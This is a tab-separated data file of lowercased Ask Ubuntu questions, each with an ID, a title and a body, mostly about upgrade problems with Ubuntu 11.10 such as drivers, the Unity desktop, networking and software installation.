67893	no video after new drivers	running ubuntu 11.10 and after updating video driver it stops loading after ( fail ) on lightdm display manager . i can get to the command prompt but do n't know any of the commands . i 've been reading and tried a few things , but nothing has worked . this has happened twice . the first time i just gave up and reloaded ubuntu . i am very new to ubuntu . my system is an old socket 754 amd system i built that still uses agp for video . my video card is a 6600gt . i have a gig of memory . the mother board is a gigabyte k8ns . every thing was running great till i tried to use the nvidia driver . i went to nvidia 's site later on a different computer and downloaded the driver it called for . how do you install it or is there an easier way ?
67894	is there any way to go to the old switcher behavior ?	the new switcher in 11.10 looks really great , but i feel like it is a loss in productivity to me . i have multiple instances of several applications open at once ( especially browsers ) many times and i like to be able to switch quickly between the all with one hand . now i have to either alt-tab and pause for a long time for the grouped windows to automatically expand , or i have to use my other hand to press down while holding alt to expand the windows . is there a way to go back to selectively go back to the old behavior where each process gets its own separate entry in the switcher where things are not grouped together ?
67896	ca n't launch skype	i just installed ubuntu 11.10 and wow ! i 'm impressed ! but unfortunately , when i install skype , i can not launch it . said to me that seem do n't have paquet in my source ? my desktop : compact processor : amd ps : my computer often `` freeze '' a little 3-4 seconds when i click on other apps . i have not a lot apps open but i think i have to free or to resize partition but i do n't know how to proceed . thank you .
67905	can get ip after upgrading to 11.10	had upgraded my laptop from 11.04 to 11.10 , desktop ubuntu . and made fresh install of ubuntu server 11.10 on another comp . and now a have exactly same problem on both computers : it does n't have working network after boot . ifconfig -a is saying that there is no ip address . unplugging/plugging ethernet cable does n't work . i have to make sudo dhclient -4 eth0 by myself to make it working , every time after boot . it helps , but it 's annoying . wtf ? how to fix that ? ps everything worked fine on same network , just before upgrading to 11.10 . other devices still working on this network without any problem . update 1 : had fixed this problem on laptop , there was no any configuration to ethernet network , at network-manager ( and i 'm sure that it was there , before upgrade ) . just made new one , and configured it as 'auto-connect ' . seems that is working now . btw , other my comp , did n't have 'network manager ' and event graphical interface . update 2 : when i 'm making sudo dhclient eth1 i get following in /var/log/syslog : oct 17 12:02:51 towerserv kernel : [ 482.693427 ] addrconf ( netdev_up ) : eth1 : link is not ready oct 17 12:02:51 towerserv dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 3 oct 17 12:02:53 towerserv kernel : [ 484.561428 ] sky2 0000:03:00.0 : eth1 : link is up at 100 mbps , full duplex , flow control both oct 17 12:02:53 towerserv kernel : [ 484.561571 ] addrconf ( netdev_change ) : eth1 : link becomes ready oct 17 12:02:54 towerserv dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 5 oct 17 12:02:55 towerserv dhclient : dhcpoffer of 192.168.1.105 from 192.168.1.1 oct 17 12:02:55 towerserv dhclient : dhcprequest of 192.168.1.105 on eth1 to 255.255.255.255 port 67 oct 17 12:02:55 towerserv dhclient : dhcpack of 192.168.1.105 from 192.168.1.1 oct 17 12:02:55 towerserv dhclient : bound to 192.168.1.105 -- renewal in 40855 seconds . oct 17 12:03:04 towerserv kernel : [ 495.376004 ] eth1 : no ipv6 routers present update 3 fixed by adding following lines into /etc/network/interfaces : auto eth0 iface eth0 inet dhcp
67909	how do i install oracle jdk 6 ?	most of the software is not thoroughly tested with java 7 and i would like to install oracle 's jdk 6.0 on ubuntu 11.10 . could someone please provide me the instructions for the same ?
67912	how can i know that 11.10 wo n't introduce hardware compatibility problems ?	i have n't upgraded from 11.04 to 11.10 yet & i am wary of doing it . i 'm afraid that the upgrade will mess up my thinkpad x120e 's wireless or some other hardware component that i 've had trouble with in the past ( but managed to get working somehow ) . how can i know that my hardware wo n't start going glitchy after the upgrade ? is there something about ubuntu 's testing process that might assure me , or should i just wait for reports from other x120e owners ( aka guinea pigs ) to come in before i make the leap myself ?
67913	does the kubuntu installer get less attention than the ubuntu installer ?	i have just tested 10 pcs . 4 were with kubuntu and 6 with ubuntu . of the 6 ubuntu pcs , 2 of them run on unity 2d . what i saw in this installation was that the installers for kubuntu were ( in the best words i can put it ) old school . for example the ubuntu installer gives you more friendly options that help in installing it in a very easy way using the gui . the kubuntu installer looks like something that came from the 90 's . the ubuntu one is friendlier in general and easier to read . the kubuntu one well , lets just say is not . to top that off , 3 of the pcs i tried crashed when running the installer . 2 of them crashes when creating a partition for /home . the other one crashed when i simply clicked next after the first language option . i had to try 4 more times until only one of them appear to accept and continue . the other 2 i just installed ubuntu on them . even the slideshow in ubuntu for example mentioned askubuntu as a source for help . the kubuntu one did not and even had the audacity to say `` if you need help click on help in the menu ! '' . so to be direct and honest about this , the question here is : does the kubuntu installer get less attention than the ubuntu installer ? and if so why ?
67915	problem during update	i tryed updating my ubuntu to the new version today , and it suddenly crashed . i then just had to reboot in mid-installation . now i can not even log in anymore , it just shows the hour on top of the screen and it is not giving me the option to log in . does anyone know how to solve this problem ? thanks
67916	increase root partition	i have to increase my root partition . not enough space remining . how can i do that without need to reformate my computer ? thank you ! ps : i use ubuntu 11.10 . update : thank you for answer . but i do n't have cd ( iso ) so i made my backup and install back ubuntu .
67918	help with wifi problem on acer aspire one 532h update to 11.10	i just upgraded to 11.10 and extremely frustratingly can not keep a stable connection to any wlan . it will connect , then disconnect , then connect , making anything that requires the internet impossible . i have run `` rfkill list '' with this output : 0 : acer-wireless : wireless lan soft-blocked : no hard-blocked : no 1 : phy0 : wireless lan soft-blocked : no hard-blocked : no i have installed b43 firmware but that does n't work . will try the bcmwl-kernel-source and see what happens . just tried that and did n't work . meanwhile , anyone have any good ideas ? will there be a patch to fix this ?
67919	incorrect keypresses on lenovo y560p	most of the keys on my lenovo y560p work fine usually but sometimes some of them will register incorrect keypresses . for example , the u key will register as `` volume up '' , the n will be `` esc '' . but most of the others will be fine . usb keyboards work fine . seems to happen intermittently . laptop : lenovo y560p ubuntu : 10.04 lts
67920	defaulted to wrong color scheme , how do i change it back ?	i understand that there 's no ( easy ) way tot change the color scheme in oneiric , and that would really be fine if it defaulted to the right one in the first place . instead , it defaulted to the theme i was using when i upgraded to natty , and now i ca n't change it for the life of me . see the following screenshot . is there any possible way i can get the colors to look right ?
67924	where are my `` recent documents '' in unity ?	i used to be able to get my recently owned documents with about one click from the drop down menu in gnome2 . in unity i ca n't find recent documents anywhere . searching on the net , there is some mention of `` quick lists '' or something , but it seems to be application specific . i just want a recent documents list . how and where do i get it for unity ?
67925	how to create a desktop shortcut in unity ?	is there an easy way to create a desktop shortcut for an application in unity ? the ability to right click or drag and drop icons to the desktop in unity does not seem to be there .
67927	how do i get `` restart '' option in the shutdown menu in unity ?	the dropdown menu i get when i click on the gear link in the top right corner only shows these options : lock computer logout suspend hibernate shutdown there is no `` restart '' or `` reboot '' . how can i make that option available ? bonus question : can i remove hibernate , lock , and suspend ?
67935	issues checking out code from google code	i 've recently upgraded to ubuntu 11.10 and since then , i have n't been able to checkout code from google code . i ca n't get it with either svn or git , but they were both working before the upgrade ( so i 'm assuming it 's a problem with 11.10 ) . svn : $ svn checkout https : //project.googlecode.com/svn/ project -- username me @ gmail.com svn : options of 'https : //project.googlecode.com/svn ' : ssl handshake failed : secure connection truncated ( https : //project.googlecode.com ) git : $ git clone https : //me @ code.google.com/p/project/ cloning into project ... password : error : gnutls_handshake ( ) failed : a tls packet with unexpected length was received . while accessing https : //me @ code.google.com/p/project/info/refs fatal : http request failed any ideas ? git version 1.7.5.4 svn , version 1.6.12 ( r955767 ) openssl 1.0.0e-2ubuntu4 libneon27-gnutls 0.29.6-1 edit : just confirmed with my 11.04 netbook that i can checkout google code via https with subversion . i compiled subversion-1.7.0 from source using the neon 0.29.6 and openssl with no luck . it now gives svn : e175002 . edit 2 : just to be clear , i only seem to have this problem with google code . i can check out code from all of the other repositories that i 've tried .
67937	what 's the difference between ati fglrx drivers and the `` post release update '' driver ?	so here 's the deal : fresh install of ubuntu 11.10 , got some basic applications like code : :blocks , wine , and such . i go to download the fglrx drivers because the open source ones do n't seem to work to well . in my list of additional drivers ( jockey ) , i have two options . the plain ati/amd fglrx driver , and another labeled something along the lines of ati/amd fglrx driver ( post release update ) . the plain fglrx driver installs just fine , but the post update gives me an error when i attempt to install it . here 's the log file : pastebin.com/rjmskxwu why can i not install what i assume is a helpful update to the fglrx dirver ?
67938	overheats to 99 c and shuts down during the update	i 'd like to update lubuntu from 11.04 to 11.10 . i installed lm-sensors and see that it goes to 99.0 c during the update , and then the laptop shuts down . ( crit = +100.0 c ) the bottom of the laptop becomes generally hot , while the areas around the fan and around the cd player stay relatively cool .
67939	why does ubuntu 11.10 start and shut down so slowly ?	ubuntu 's always been very fast on my computer . i have 3gb ram , and previous versions booted in under 40s and shut down in under 5s . most recently , natty took 40s to boot and only 4s to shut down . however , since installing oneiric , my boot time has gone up to 50s and my shut down time to over 11s ! a slight increase is fine , but this is quite alarming . i wait for applications to properly terminate , so that 's not the issue . the only startup applications i have are jupiter and caffeine .
67941	laptop asus g1s no sound from built-in speakers	after installing 11.10 from 11.04 i do not have sound coming out from my built-in speakers when i plug in headset or other speaker it works fine but the built-in speakers wo n't make a noise ... i tried reinstalling system=no results any possible sound option does not help either . any ideas ? thanks
67945	problem when downloading ubuntu	i tried to download ubuntu 10.04 lts but i took a very long time ( it stated , '1 day left ' ) so i cancelled the download process..or maybe i did it incorrectly . can somebody help me ?
67946	force alt + tab switcher to display applications from active workspace	after upgrading to 11.10 , the behavior of applications switcher ( alt + tab ) has changed . now it displays applications across all workspaces . i have a lot of windows opened when working . i 'm grouping opened applications to separate sets which are placed on different workspaces . this is how i found myself be more productive . but now it became totally time consuming , if i need click `` tab '' button more than 10 times while i reach some app . how can i force the windows switcher to display only applications from current workspace ?
67948	my launcher disappeared	installed 11.10 today to my netbook , and after a reboot the launcher is gone entirely . it does n't show user info in top right or anything either , just `` file edit view go.. '' in the top left . alt+f2 does nothing . mouse to the left side does nothing . super button does nothing . have n't altered it in any way , just finished a clean install .
67952	numlockx no longer works after upgrade to 11.10	repeated what has worked for me in the past without any success . and no , there 's not an option in the bios . this sucks . it 's a minor issue , but it attacks my laziness which is forbidden ! o_0
67953	plymouth in an intel gma 4500	i ca n't fix the plymouth resolution problem . when i shut down the splash works fine , but in the boot screen i only see the animation in the up left corner . is there any solution ? thks
67956	why is n't skype showing up in the systray after upgrading to 11.10 ?	i have tried allowing skype to show up in the systray by running : gsettings set com.canonical.unity.panel systray-whitelist `` [ 'javaembeddedframe ' , 'wine ' , 'scp-dbus-service ' , 'update-notifier ' , 'skype ' ] '' i also attempted to do : gsettings set com.canonical.unity.panel systray-whitelist `` [ 'all ' ] '' both of the times i restarted skype afterwards . any ideas ?
67965	laptop minimal power consumption tweaks	i 've recently installed ubuntu 11.10 on a new lenovo x220 laptop with a 9-cells battery . i have a trans-atlantic flight coming up , and i would like to use my laptop during it . lenovo claims that this battery should last for a really long time . how can i configure my laptop to consume minimal power ? i did n't see any detailed power management panel in the system settings , so how to i tweak it ? also , can someone report a tried-and-tested configuration ? performance is not an issue , since i 'm going to use it for coding or reading during the flight , not for playing games of watching movies . playing audio would be nice , but not a must .
67972	how do i get out of this mess caused by power failure while upgrading to 11.10 ?	i will start by saying i am an idiot . i went to bed while upgrading from 11.04 to 11.10 . when i woke up i realzed the power had gone . ( where i live they 'take light ' ) initially , booting up showed me several versions of ubuntu and their 'safe mode ' versions . ( i have no idea where they came from ) . selecting one of them brought me to a screen saying '' waiting for network fonfiguration '' then after a while '' booting system without full network configuration '' after waiting for forever , i restarted my system . i now get to a blank black page . how do i get out of this mess ?
67973	repeated keystrokes lost in unity	i have strange bug . sometimes after pressing any key on my keyboard while working in unity programs does not receives the event of pressing but in plain terminal ( ctrl+alt+f1 ) keyboard works just well . please tell me if somebody solve that problem ? it looks like if i quick press one key several times only first press works , but if i press the same key with time interval of one second so it works normally .
67980	how can i get an `` applications , places '' menu on the top panel in unity ?	i 've figured out how to kill the launcher ( in unity 2d , which is what i 'm using on my laptop ) , and now i want to put an applications and places menu on the top panel so that it is always there . this is what i want : however , the top panel in unity is really hard to work with . i ca n't right click on it , move it , add apps to it ... it 's like it 's made out of stone . how can i get it to take a menu , and place that menu where i want ? i am willing to accept variants on the exact software that drives the menu , just so long as it is permanently affixed in the top left of the screen , and it is a drop down menu . bonus points if it has a `` recentl documents '' menu . i am not interested in running `` gnome classic '' . it is problematic in all sorts of other ways . i am looking to customize unity . please no suggestions to log out and log in again using gnome classic . thanks .
67984	how do i specify the location tomboy is to use to store the notes ?	how do i specify the location tomboy is to use to store the notes ? i am on 10.10 ( maverick ) . edit : somebody posted the right answer but now it seems to have been deleted . from memory : it has to do with editing your /etc/profile with a secret line that causes a new location to be used . then you reboot . your old notes will not be transferred over but you can move them over manually from the `` hidden '' location which is what i did after i deleted the annoying `` default '' notes . deleting default notes seems to not have caused disastrous system problems so i think they are just like any other notes . but if you get problems , just do n't use tomboy . to get off tomboy you can print your notes , courier the papers to a company that will ocr scan them . then you can then import them into software that is explicit about the location they are stored . there are probably other ways that probably do n't involve paper .
67990	how do i install skype on 11.10 when using kubuntu ( kde4.7 ) ?	i have added the partner repository , however when issuing aptitude install skype the proposed solution is to remove all of libs concerning kde4 , plasma , dolphin and a hundred other packages . that seems very wrong , i dont want to remove my kde4 plasma desktop just to install a 32bit program . help ?
67992	directory error when trying to create a new user	i added a second user 'shirley ' in settings - > user accounts , and set a password . the account type is standard . in 11.04 , this worked and i logged in and had a functioning desktop for this user . how is this done in 11.10 ? when i try to log in as this user i have this error : nautilus could not create the required folder `` /home/shirley/.config/nautilus '' . before running nautilus , please create the following folder , or set permissions such that nautilus can create it . the only option then is to click ok , this dumps me out to full-screen nautilus , like this : there is no launcher or visible way to start any programs . print screen does n't take a screengrab . the desktop is similar to this question but i get no terminal when i press ctrl+alt+t . i have to press ctrl+alt+f2 and restart from the terminal to get out of this . this answer is to install gnome-system-tools . should n't i be able to add a second user with the default install ? edit : i tried the deluser+adduser suggestion , there was no change after trying it . here is what i got : tom @ desktop : ~ $ sudo deluser shirley [ sudo ] password for tom : removing user `shirley ' ... warning : group `shirley ' has no more members . done tom @ desktop : ~ $ sudo adduser shirley adding user `shirley ' ... adding new group `shirley ' ( 1001 ) adding new user shirley ' ( 1001 ) with groupshirley' the home directory '/home/shirley ' already exists . not copying from `/etc/skel ' . enter new unix password : retype new unix password : passwd : password updated successfully changing user information for shirley enter the new value , or press enter for the default full name [ ] : room number [ ] : work phone [ ] : home phone [ ] : other [ ] : is the information correct ? [ y/n ] y what has gone so wrong with simply adding a second user ? am i the only one having this problem ? i 'd reinstall if that fixed things , but this is a fresh install only a few days old .
67994	windows 7 on domain access ubuntu shared folder	had the samba setup done and when w7 access using \ip_address\share it prompts but only allow domain name login . how should i go about it without dropping out w7 from domain ?
67995	how do you open pgp-encrypted documents from nautilus ?	seahorse ( gnome pgp/gpg frontend ) integration is not working in 11.10 . in 11.04 you could open pgp-encrypted documents from nautilus by dbclking and entering the pgp passphrase when prompted . 11.10 does n't try to open it , even if seahorse is installed , and if you use `` open with other application '' and then do `` find applications online '' , it will recommend kgpg .
67996	my java install is broken	i have recently upgraded to ubuntu 11.10 and was noticing that java was not working on a few websites and ran a check : keith @ kd-pb : ~ $ java -version java version `` 1.5.0 '' gij ( gnu libgcj ) version 4.6.1 copyright ( c ) 2007 free software foundation , inc . this is free software ; see the source for copying conditions . there is no warranty ; not even for merchantability or fitness for a particular purpose . so i uninstalled my java ( openjdk 1.6.0 according to ubuntu software centre ) and reinstalled it and all the dependicies . so tried checking i had the right java package installed ; keith @ kd-pb : ~ $ sudo update-alternatives -- config java there is only one alternative in link group java : /usr/bin/gij-4.6 nothing to configure . so now i am scratching my head and not sure what is wrong . i have installed oracle 's jre 6 and it works straight away , so what could be wrong with the openjdk ? thanks update - from some suggestions i inputted the following and think there is a problem with where /etc/alternatives/java is pointing ; keith @ kd-pb : ~ $ ls -l which java lrwxrwxrwx 1 root root 22 2011-10-17 06:34 /usr/bin/java - > /etc/alternatives/java keith @ kd-pb : ~ $ ls -l /etc/alternatives/java lrwxrwxrwx 1 root root 16 2011-10-17 06:34 /etc/alternatives/java - > /usr/bin/gij-4.6 keith @ kd-pb : ~ $ dpkg -s /usr/lib/jvm/java-6-openjdk/jre/bin/java openjdk-6-jre-headless : /usr/lib/jvm/java-6-openjdk/jre/bin/java
67998	reboot/shutdown fails	i have ubuntu 11.10 ( oneiric ocelot ) on my pc . pc has intel dh61cr motherboard . whenever i try to reboot or shutdown my pc , it will freeze , vieweing only ubuntu logo with white dots under it on violet background . i always have to use physical reset or shut down button to do what i want . help me out please ! kern.log : oct 17 14:37:35 ruberoid kernel : [ 11046.996931 ] init : tty4 main process ( 967 ) killed by term signal oct 17 14:37:35 ruberoid kernel : [ 11046.997074 ] init : tty5 main process ( 973 ) killed by term signal oct 17 14:37:35 ruberoid kernel : [ 11046.997202 ] init : tty2 main process ( 979 ) killed by term signal oct 17 14:37:35 ruberoid kernel : [ 11046.997327 ] init : tty3 main process ( 980 ) killed by term signal oct 17 14:37:35 ruberoid kernel : [ 11046.997525 ] init : tty6 main process ( 982 ) killed by term signal oct 17 14:37:35 ruberoid kernel : [ 11046.997730 ] init : irqbalance main process ( 1000 ) killed by term signal oct 17 14:37:35 ruberoid kernel : [ 11046.997871 ] init : cron main process ( 1010 ) killed by term signal oct 17 14:37:35 ruberoid kernel : [ 11046.998227 ] init : tty1 main process ( 1261 ) killed by term signal oct 17 14:37:35 ruberoid kernel : [ 11047.024385 ] init : plymouth-upstart-bridge main process ( 25537 ) terminated with status 1 oct 17 14:37:35 ruberoid kernel : kernel logging ( proc ) stopped . dmesg [ 12.946207 ] type=1400 audit ( 1318840388.898:8 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=894 comm= '' apparmor_parser '' [ 12.946437 ] type=1400 audit ( 1318840388.898:9 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=894 comm= '' apparmor_parser '' [ 12.946577 ] type=1400 audit ( 1318840388.898:10 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=894 comm= '' apparmor_parser '' [ 12.946679 ] type=1400 audit ( 1318840388.898:11 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=898 comm= '' apparmor_parser '' [ 13.052754 ] vesafb : mode is 1400x1050x32 , linelength=5632 , pages=0 [ 13.052755 ] vesafb : scrolling : redraw [ 13.052757 ] vesafb : truecolor : size=0:8:8:8 , shift=0:16:8:0 [ 13.056229 ] vesafb : framebuffer at 0xe0000000 , mapped to 0xffffc90006e00000 , using 5824k , total 5824k [ 13.056319 ] console : switching to colour frame buffer device 175x65 [ 13.056334 ] fb0 : vesa vga frame buffer device [ 13.574711 ] init : failsafe main process ( 857 ) killed by term signal [ 13.574991 ] init : apport pre-start process ( 969 ) terminated with status 1 [ 13.578789 ] init : apport post-stop process ( 994 ) terminated with status 1
68000	how to enable ubuntu classic and compiz-config ?	after upgrading to 11.10 from 11.04 , first , ubuntu classic got disabled but i got it back using fall back option . now it does not look anything like it used to . my previous settings are all washed out . compiz-config does not seem to work at all . it is not in the startup applicaions list . none of the enabled effects work . i have already installed nvidia graphics driver . please help . also , i had a customized theme before upgrading . both the theme and the customization option seem to have disappeared . can i get the saved theme back ? i use sudo wvdial to connect to the internet . but the ubuntu software center does not recognize the internet connection and does not allow me to install any softwares . please help .
68001	how do i install gimp 2.7 ?	i just reinstalled my ubuntu system with 11.10 , but ran into a problem when i tried to install gimp 2.7 . i always get unmet dependencies ( it 's german , so i ca n't tell you the exact english translation ) : needs gimp-data ( < = 2.6.11-z ) but 2.7.3-2011082002~oo should be installed i already read the follow post , but the answers did n't really help me . when i type in sudo apt-get install gimp=2.6 it just says that there is no version 2.6 found . i get the same with 2.7 . i really need gimp . but installing gimp 2.6 is n't possible as well . when i remove the repos for 2.7 , i still get the same error .
68003	how to change the background colour of a window ?	since 11.10 you ca n't change much in the appearance options , just the windows border styles but not the background colour like you could do it in natty . for some odd reason as i upgraded to 11.10 , it took the colour theme i had in 10.04 ! a greenish background which suited pretty nicely to my wallpaper and my custom emerald theme . now i have a mix of those colors , it looks horrible . i tried the gnome-tweak-tool but you ca n't customize the window background color . here and example how it looks like : help would be much appreciated , edit : okay i got it . for those who have the same issue , here is the solution : http : //blog.angeloff.name/post/11431459380/ubuntu-11-10-replace-the-default-and-annoying-orange i just reset it to default the gtk-color-scheme entry .
68006	how to fix desktop reloading during logout/shutdown/restart after upgrading to 11.10 ?	since i 've upgraded my system to ubuntu 11.10 ( oneiric ocelot ) , i 'm facing a strange problem each time i logout/shutdown/restart : as usual , unity 's launcher , global menu , desktop items and desktop are unloaded ; screen flickers ; desktop items are reloaded but at another position ( i suppose because there is no launcher ) with clearlooks theme [ please note i 'm using ambiance theme ] ; sometimes i 'm also asked to provide the password to unlock the keyring [ each time i get this window , my desktop items are ones over the others at next logon ] ; after about 25 seconds , the logout/shutdown/restart continues without problem . i 'm sure this is due to some parameters in my user profile , because if i create a new user i do n't have the problem at all . for information , i 've already tried to reset gnome by removing .gnome , .gnome2 , .gconf , .gconfd , .metacity . i 've also removed compiz configuration and nautilus configuration as well as doing some cleanup in .config ( dconf , ... ) and .local ( applications , mime , ... ) . i 'm very interested in finding the culprit , but i do n't know anywhere else i can search in user home folder ... any advice will be very appreciated ! thank you in advance for your help .
68007	configuring permissions for ftp and apache	i have a web server ( apache2 ) that i access with filezilla . on my web server i have a dir /home/admin/www that i binded to /var/www . so i can access it with ftp . this works perfect ! but everytime i restart my web server i have to do the bind again and again . ca n't i say to my webserver that those maps need to be binded for always ? also i need to reset all my permissions everytime again , what am i doing wrong ?
68010	how to change the default input method in the input area of dash , folder rename , etc	i 'm using a chinese input method ( fcitx4.1 ) . when i starting input in dash ( or rename in folder ) , the words did n't came out . i had to right click in the input area and change the input method from `` system ( x input method ) '' to `` none '' or something . as it 's now impossible to input chinese character in them , is there any method that could change the default input method in the input area to `` none '' or others ?
68012	how do i add `` recovery console '' and `` user defined session '' in the login menu ?	ubuntu 11.10 was loaded without a hitch however to obtain classic fallback i followed the following instructions - http : //www.liberiangeek.net/2011/08/return-to-ubuntu-classic-desktop-in-ubuntu-11-10/ log on menu now shows gnome classic gnome classic ( no effects ) ubuntu ubuntu 2d '' recovery console '' and `` user defined session '' are not options - i ca n't remember if those options were available before entering fallback command . how can i obtain these two options on menu ? please note my last comment - maybe all is well ?
68013	ca n't link contacts in empathy 3.2	i have installed ubuntu 11.10 , with empathy 3.2 . i tried to link any contacts but it does not work . what should i do ? thank you
68015	synctex with gedit and evince	in oneiric gedit includes support for synctex and evince has supported it since 2.32 ( oneiric includes evince 3.2.0 ) . how do i use synctex with gedit and evince ? i have compiled with the -synctex=1 option but nothing happens when i try to backward/inverse search by ctrl+click on the document in evince .
68018	how do i install eclipse indigo 3.7.1 ?	i have downloaded eclipse indigo 3.7.1 . i used to try to install it into ubuntu 11.10 as install on ubuntu 11.04 but it does n't work . please anyone tell me how to install it into ubuntu 11.10 . sorry for my english : )
68022	how to fix font rendering ( no anti-aliasing ) in unity global menu and search ?	since i 've upgraded my system to ubuntu 11.10 , unity 's global menu and search are having font rendering problems ( no anti-aliasing , bad font sizes ) . no problem in sub-menus . the font rendering problems do not appear on a newly created user . just the ones which were existing before the upgrade . what can i do to solve the rendering problems ?
68024	how to remove or modify a review in ubuntu software center ?	i think the title says it all . let 's say you give a very buggy program an one-star rating , but 6 months later it matured and you want to change your review . or you just made some typos which need to get fixed . ; )
68025	ca n't load the desktop after lightdm screen	i 've just installed oneiric in my hp pavillion dv6000 . the installation was fine , it finished without a problem . i rebooted the laptop and it went to the lightdm screen i typed my password and as it was loading the desktop it stop and came back to the lightdm screen . i think it was a hardware problem and i tried to install classic gnome desktop on terminal . it was fine again ( the terminal after ctrl+alt+f2 works fine ) when i choose classic gnome no effects the problem is he same . it came back to the lightgdm screen . can someone help me ?
68028	how do i check if ubuntu is using my nvidia graphics card ?	the reason i 'm asking is that none of the games i 've installed through software center that require 3d accelartion like torcs for instance will run . when i try to run then , nothing happens . i have a dell inspiron n5110 with a nvidia geforce gt 525m . i tried the following which i were some suggestions for people with similar problems : lspci -v which gave me : 01:00.0 vga compatible controller : nvidia corporation device 0df5 ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : dell device 04ca flags : bus master , fast devsel , latency 0 , irq 16 memory at f5000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at f0000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at e000 [ size=128 ] expansion rom at f6000000 [ disabled ] [ size=512k ] capabilities : < access denied > kernel driver in use : nvidia kernel modules : nvidia_current , nvidia_current_updates , nvidia , nouveau , nvidiafb i also tried : egrep -i `` connected|card detect|primary dev '' /var/log/xorg.0.log which gave me : [ 20.873 ] ( ii ) intel ( 0 ) : output lvds1 connected and : nvidia-smi -a which gave : nvidia : could not open the device file /dev/nvidiactl ( no such file or directory ) . nvidia-smi has failed because it could n't communicate with nvidia driver . make sure that latest nvidia driver is installed and running . i do n't really understand what all this means . please help .
68034	network storage device no longer accessible after 11.10 upgrade	after upgrading to 11.10 , i lost access to my network storage device ( nsd ) . i had access earlier in the day before upgrading . it sees the nsd but bombs out trying to access it . i get unable to mount location failed to retrieve share list form server . i broke out my old computer , which is still running 11.04 and it has no problem accessing the drive . so it 's not the nsd , it 's 11.10 . i tried various things such as installing samba but no luck .
68036	ca n't open .xlsx file with libreoffice	.xlsx files are not opening in libreoffice 3.4.3 in ubuntu 11.10 . could not open `` abc.xlsx '' archive type not supported .
68043	unity 2d on multi monitor , close , min , max-buttons not available on 2nd screen	in unity 2d and a multi monitor setup ( ubuntu 11.10 ) , the buttons for closing , minimizing and maximizing windows are not available on the second screen , if the windows are maximized . there is also no panel showing on the second screen . so there is no menu available for applications on the second screen . in 11.04 , when an window was in fullscreen on screen 2 the close , min , max buttons where available on the top left corner of screen one . if i needed the menu from an application maximized on scrren two , i minimized or better said centered it , pushed it to the first screen used the menu and returned it on screen two . now this seems undoable .
68046	how can i change the default music player ?	using ubuntu 11.10 . i have mp3 files . when i double-click an mp3 file , i would like vlc to open ( not banshee ) . how can i do this ?
68051	some characters like quotes only appear after pressing spacebar , how to change this ?	after installing 11.10 the behaviour of my keyboard changed . i now suddenly need to press spacebar after typing some special characters like quotes to make them appear . how can i fix this ? this was n't the case in 11.04 .
68052	hp 431 is overheating , how can i fix it ?	i 'm using ubuntu 11.10 ( ubuntu 's recommended radeon vga driver is error ) on my hp 431 ( cpu intel core i5 2410m - 2g ram - 320 hdd - radeon hd6470 vga ) . everything is ok , except heat problems ( it 's not happen on win7 ) . is my hp 431 ( win7 pre-setup ) ca n't use ubuntu ? sorry my bad english .
68059	how to preview files using gloobus-preview ?	i 'd like to preview files using gloobus-preview in ubuntu 11.10 but i ca n't figure out how to do it . and i do n't want to use gnome-sushi ...
68062	opening web locations in unity	using 11.04 at the moment - 11.10 crashed ! ! ! ! , i have been using the gnome environment but have decided to try unity ! in the gnome environment i set up icons on the top of screen launcher bar ( right click et al ) and found these very useful to access most of my regular web accounts - eg hotmail , ebay and other sites . i have no idea how to do this in the unity environment ? i have searched the web for internet launchers in unity and just do n't see any real reference on how to do this - applications yes - locations no ! has anyone got an idea of how to do this ? please respond in simple terms for a complete novice ! thank you
68067	how much faster is lubuntu ?	will i notice performance increases if i switch to lubuntu ? in what areas will i see the most significant changes ? and in what areas am i unlikely to notice any ? would switching to lubuntu be indicated for an older computer with < = 1gb ram ?
68068	if i try lubuntu and then remove it can i expect my normal ubuntu to be safe and unchanged ?	if i install lubuntu-desktop to try lubuntu and then later remove it , will my normal ubuntu be safe , unchanged and uncluttered ?
68070	how to configure microsoft exchange 2007 with evolution	i got following error while collection the exchange server is not compatible with exchange connector . the server is running exchange 5.5 . exchange connector supports microsoft exchange 2000 and 2003 only . my server is hosted on ms exchange 2007 so is there any way out ?
68076	does an incomplete update affect my programs ?	i saw a pop up which said 'updates are available ' so i clicked it . i completely forgot that the installation was incomplete , i logged off . now when i came back , it told me to do a partial update . i read the internet for information , partial update was n't the safest thing for me . i tried to log in to skype , it said another skype may exist . that was n't true , skype was n't opened . i 'm not sure if it 's because of the incomplete update , but i 'm quite off , in trouble . please reply . thank you regards junior
68078	keyboard shortcut for `` open a terminal here ''	how can i create a keyboard shortcut so that when i press f12 in nautilus ( or desktop ) , i get a terminal in the current directory ?
68079	ati graphical driver installation error	i just installed ati driver , but when i am trying to start tha amd/ati control center , i 'm getting the following error : there was a problem initializing catalyst control center linux edition . it could be caused by the following . no amd graphics driver is installed , or the amd driver is not functioning properly . please install the amd driver appropriate for you amd hardware , or configure using aticonfig . is it possible to fix this ?
68080	how do i edit mediawiki articles from libreoffice writer ?	the libreoffice extentions page says that the wiki publisher is included as a standard feature in 3.3 . this was not true for me although i am running libreoffice 3.3.4 ooo330m19 ( build:401 ) tag libreoffice-3.3.3.1 , ubuntu package 1:3.3.4-0ubuntu1 . so , i installed the package libreoffice-wiki-publisher from synaptic ( same thing you need to do in openoffice.org 3 ) . i did this while writer was running , so i had to restart it for the publishing option to appear ( file | send ... | to mediawiki ... ) when i click on `` to mediawiki ... '' i get the following error : the mediawiki export filter can not be found . choose 'tools-xml filter settings ' to install the filter , or use the setup to install the component . is this a bug or is there something else i need to do ?
68081	slow desktop performance in ubuntu 11.04-11.10 with proprietary amd-drivers	forgive my lack of knowledge , but i assumed that the proprietary drivers would be faster . i read somewhere that the use of vesa is much slower and ubuntu indicates that vesa is used even though the ati-drivers are recommended by the system . how can i revert back to the radeon-opensource drivers which are much faster ? even the rendering of the text i type is slow . : - (
